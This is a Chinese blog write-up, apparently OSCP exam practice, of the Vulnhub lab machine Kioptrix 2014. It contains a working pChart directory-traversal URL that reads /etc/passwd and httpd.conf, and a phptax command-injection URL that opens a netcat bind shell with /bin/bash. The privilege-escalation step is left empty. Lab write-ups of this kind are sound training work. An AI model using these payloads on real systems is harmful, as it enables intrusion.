OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

Ethan医生2周前靶场33
名称说明
靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.167

信息收集

arp-scan

image.png


nmap

image.png

80端口访问


image.png

image.png


8080端口限制访问


image.png


查看F12发现head里面 出现pChart2.1.3/index.php

image.png


http://192.168.233.172/pChart2.1.3/examples/index.php 访问看看

image.png


使用searchsploit 看看有没有pchart漏洞


image.png

cat /usr/share/exploitdb/exploits/php/webapps/31173.txt查看

image.png

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

image.png


这样就可以看8080端口出现啥限制

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

image.png

可以接收 env=Mozilla4_browser



image.png


image.png


固定修改UA头

谷歌phptax exploit,发现一个rce

https://www.exploit-db.com/exploits/21665



http://192.168.233.172/phptax/drawimage.php?pfilez=xxx; nc -l -v -p 23235 -e /bin/bash;&pdf=make



内核提权






























标签: OSCP

相关文章

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

 OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。